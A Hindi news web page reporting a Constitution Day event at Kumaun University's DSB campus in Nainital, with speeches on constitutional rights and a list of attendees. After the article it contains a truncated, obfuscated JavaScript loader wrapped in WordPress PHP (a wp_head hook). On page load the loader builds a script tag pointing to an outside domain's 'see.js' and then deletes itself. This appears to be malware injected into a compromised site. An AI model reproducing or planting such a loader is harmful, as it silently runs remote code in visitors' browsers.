Saturday, July 27, 2024
spot_img

नैनीताल : राष्ट्रीय सेवा योजना प्रकोष्ठ व नेहरू जिला युवा कल्याण के द्वारा डीएसबी परिसर में मनाया संविधान दिवस

नैनीताल ::- राष्ट्रीय सेवा योजना प्रकोष्ठ, कुमाऊं विश्वविद्यालय नैनीताल तथा नेहरू जिला युवा कल्याण नैनीताल के द्वारा आयोजित तथा शोध एवं प्रसार, कुमाऊं विश्वविद्यालय, राष्ट्रीय सेवा योजना इकाई, डी एस बी परिसर नैनीताल, केयूआईआईसी तथा वाणिज्य विभाग डी एस बी परिसर के सहयोग से संविधान दिवस का आयोजन किया गया।

सेमिनार हाॅल ओल्ड आटर्स,डीसबी परिसर में संविधान दिवस बनाया गया। कार्यक्रम के प्रारंम्भ डाॅ.विजय कुमार समन्वयक राष्ट्रीय सेवा योजना प्रकोष्ठ, कुमाऊँ विश्वविद्यालय द्वारा सभी अतिथियों का स्वागत एवं अभिनन्दन किया गया। डाॅल्वी तेवतिया जिला युवा कल्याण अधिकारी ने कार्यक्रम का प्रारूप प्रस्तुत किया तथा संविधान दिवस के महत्व पर प्रकश डाला। कार्यक्रम के वक्ता के रूप में उपस्थित प्रो.ललित तिवारी,निदेशक शोध एवं प्रसार कुमाऊँ विश्वविद्यालय ने संविधान दिवस की सभी को बधाई देते हुए भारत के संविधान पर विस्तार से चर्चा की। उन्होने कहा कि भारत का संविधान अन्य देशों की तुलना में अनुठा है यह आम व्यक्ति को भी एकसमान रूप से अधिकार देने वाला है। भारत में एक नागरिकता को मान्यता देने वाला है। उन्होने कहा भारत का संविधान समाजिक तथा आर्थिक शक्तियां प्रदान करने के साथ साथ मजबूत लोकतंत्र का अधार है।

डाॅ.दीपाक्षी जोशी विभागाध्यक्ष डाॅ.राजेन्द्र प्रसाद विधि संस्थान कुमाऊँ विश्वविद्यालय ने संविधान दिवस की बधाई देते हुए कहा कि भारत के संविधान तथा उसके अनुच्छेदों मेें एमेंडमेंड के कारण जनमानस को अधिकार मिले हैं। जहा महिला सशक्तिकरण और प्रभावी हुआ है शिक्षा का अधिकार से सभी को गुणवत्ता प्राप्त शिक्षा का अधिकार मिला हैं। उन्होने हाल ही में हुए कुछ अनुच्छेदों के संशोधन पर प्रकाश डालते हुए धारा 370 तथा साबरमती मंदिर में महिलाओं के प्रवेश पर चर्चा की। उन्होनें सभी उपस्थित लोगों को संविधान के मुख्य पहलुओं की शपथ दिलाई।

मोहित कुमार जिला विधिक सेवा प्राधिकरण से उपस्थित ने संविधान दिवस के अवसर पर संविधान में दी गयी शक्तियों तथा दायित्वों पर प्रकाश डालते हुए, जिला विधिक सेवा प्राधिकरण द्वारा दी जा रही सहायता का उल्लेख किया। कार्यक्रम के अन्त में डाॅ.ललित मोहन कार्यक्रम अधिकारी राष्ट्रीय सेवा योजना डीएसबी परिसर ने सभी अतिथियों तथा विधार्थियों का आभार व्यक्त करतें हुए सविधान दिवस की बधाई दी। कार्यक्रम में सभी वक्ताओं तथा अतिथियों को डाॅल्वी तेवतियां द्वारा नेहरू युवा केन्द्र का मोमंटों देकर आभार व्यक्त किया तथा सभी प्रतिभागियों को नेहरू युवा केन्द्र नैनीताल द्वारा प्रमाण
पत्र भी वितरित किये ।

इस अवसर पर डाॅ.दीपक कुमार प्रभारी राष्ट्रीय सेवा योजना डीएसबी परिसर,डाॅ.ममता जोशी, डॉ.मनोज पाण्डे, डाॅ
जीवन उपाध्याय, डाॅ. सारिका वर्मा, डाॅ.अंकिता आर्या, डाॅ. पूजा जोशी, आस्था अधिकारी ,पंकज भट्ट ,मीनू जोशी, स्वाती जोशी, मोहित पंत , कुंदन,अजय कुमार समेत अन्य लोग उपस्थित रहे।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>